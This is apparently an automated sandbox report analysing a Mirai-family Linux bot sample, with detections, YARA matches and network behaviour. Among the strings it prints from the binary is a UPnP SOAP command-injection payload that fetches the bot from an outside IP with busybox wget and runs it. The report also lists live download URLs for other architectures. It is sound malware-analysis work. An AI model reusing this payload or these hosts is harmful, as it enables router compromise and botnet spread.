Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
momo.m68k.elf

Overview

General Information

Sample name:momo.m68k.elf
Analysis ID:1584459
MD5:3a2ca0a44ce8859251bac7659db54462
SHA1:d02c707d8a8f9f7624c29f798742044b23226db3
SHA256:8bbbebd38cf24db9b2673993a020bb5a00ca616abc6b9178122c533ddead6967
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584459
Start date and time:2025-01-05 15:20:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:momo.m68k.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@0/0
  • VT rate limit hit for: http://123.253.61.116/fuck/momo.arm7;chmod
  • VT rate limit hit for: http://123.253.61.116/fuck/momo.mips;
  • VT rate limit hit for: http://123.253.61.116/fuick/momo.x86
Command:/tmp/momo.m68k.elf
PID:5508
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
SpasoBuild-BadWolf-MomentumProduc
Standard Error:
  • system is lnxubuntu20
  • momo.m68k.elf (PID: 5508, Parent: 5432, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/momo.m68k.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
momo.m68k.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    momo.m68k.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x12ae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12af8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12b98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12bac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12bc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12bd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12be8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12bfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12c74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    SourceRuleDescriptionAuthorStrings
    5508.1.00007fe330001000.00007fe330017000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5508.1.00007fe330001000.00007fe330017000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x12ae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12af8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12b98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12be8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12bfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12c74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5516.1.00007fe330001000.00007fe330017000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5516.1.00007fe330001000.00007fe330017000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x12ae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12af8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12b98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12bac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12bc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12bd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12be8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12bfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12c74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        Process Memory Space: momo.m68k.elf PID: 5508Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x9eb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9ec4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9ed8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9eec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9f8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9fa0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9fb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9fc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9fdc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x9ff0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xa004:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xa018:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xa02c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xa040:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        Click to see the 1 entries
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: momo.m68k.elfVirustotal: Detection: 55%Perma Link
        Source: momo.m68k.elfReversingLabs: Detection: 60%
        Source: global trafficTCP traffic: 192.168.2.13:44298 -> 1.1.1.1:3778
        Source: /tmp/momo.m68k.elf (PID: 5508)Socket: 127.0.0.1:9473Jump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: momo.m68k.elfString found in binary or memory: http://123.253.61.116/fuck/momo.arm7;chmod
        Source: momo.m68k.elfString found in binary or memory: http://123.253.61.116/fuck/momo.mips;
        Source: momo.m68k.elfString found in binary or memory: http://123.253.61.116/fuick/momo.x86
        Source: momo.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: momo.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

        System Summary

        barindex
        Source: momo.m68k.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5508.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5516.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: momo.m68k.elf PID: 5508, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: momo.m68k.elf PID: 5516, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 123.253.61.116 -l /tmp/bigH -r /fuck/momo.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: momo.m68k.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5508.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5516.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: momo.m68k.elf PID: 5508, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: momo.m68k.elf PID: 5516, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: classification engineClassification label: mal64.troj.linELF@0/0@0/0
        Source: /tmp/momo.m68k.elf (PID: 5510)Directory: /tmp/.Jump to behavior
        Source: /tmp/momo.m68k.elf (PID: 5510)Directory: /tmp/..Jump to behavior
        Source: /tmp/momo.m68k.elf (PID: 5508)Queries kernel information via 'uname': Jump to behavior
        Source: momo.m68k.elf, 5508.1.000056276fb5b000.000056276fbe0000.rw-.sdmp, momo.m68k.elf, 5516.1.000056276fb5b000.000056276fbe0000.rw-.sdmpBinary or memory string: o'V!/etc/qemu-binfmt/m68k
        Source: momo.m68k.elf, 5508.1.00007ffce5a07000.00007ffce5a28000.rw-.sdmp, momo.m68k.elf, 5516.1.00007ffce5a07000.00007ffce5a28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
        Source: momo.m68k.elf, 5508.1.00007ffce5a07000.00007ffce5a28000.rw-.sdmp, momo.m68k.elf, 5516.1.00007ffce5a07000.00007ffce5a28000.rw-.sdmpBinary or memory string: z7x86_64/usr/bin/qemu-m68k/tmp/momo.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/momo.m68k.elf
        Source: momo.m68k.elf, 5508.1.000056276fb5b000.000056276fbe0000.rw-.sdmp, momo.m68k.elf, 5516.1.000056276fb5b000.000056276fbe0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: momo.m68k.elf, type: SAMPLE
        Source: Yara matchFile source: 5508.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5516.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: momo.m68k.elf, type: SAMPLE
        Source: Yara matchFile source: 5508.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5516.1.00007fe330001000.00007fe330017000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
        Hidden Files and Directories
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Standard Port
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584459 Sample: momo.m68k.elf Startdate: 05/01/2025 Architecture: LINUX Score: 64 14 1.1.1.1, 3778, 44298, 44300 CLOUDFLARENETUS Australia 2->14 16 Malicious sample detected (through community Yara rule) 2->16 18 Multi AV Scanner detection for submitted file 2->18 20 Yara detected Mirai 2->20 8 momo.m68k.elf 2->8         started        signatures3 process4 process5 10 momo.m68k.elf 8->10         started        process6 12 momo.m68k.elf 10->12         started       
        SourceDetectionScannerLabelLink
        momo.m68k.elf55%VirustotalBrowse
        momo.m68k.elf61%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://123.253.61.116/fuck/momo.arm7;chmodmomo.m68k.elffalse
          unknown
          http://123.253.61.116/fuick/momo.x86momo.m68k.elffalse
            unknown
            http://123.253.61.116/fuck/momo.mips;momo.m68k.elffalse
              unknown
              http://schemas.xmlsoap.org/soap/encoding/momo.m68k.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/momo.m68k.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  1.1.1.16fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/ctrl/playback.php
                  PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                  • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                  AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/
                  INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                  • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                  Go.exeGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSz0r0.sh4.elfGet hashmaliciousMiraiBrowse
                  • 172.71.176.132
                  drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 104.26.13.205
                  avaydna.exeGet hashmaliciousNjratBrowse
                  • 104.17.25.14
                  HateSpeech2024_Summary.pdf.lnk.bin.lnkGet hashmaliciousEmmenhtal Loader, MalLnkBrowse
                  • 104.21.2.79
                  paint.exeGet hashmaliciousBlank GrabberBrowse
                  • 162.159.137.232
                  K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                  • 104.21.56.70
                  hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                  • 162.159.135.234
                  IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                  • 104.21.56.70
                  3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                  • 104.21.43.44
                  3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                  • 104.21.48.1
                  No context
                  No context
                  No created / dropped files found
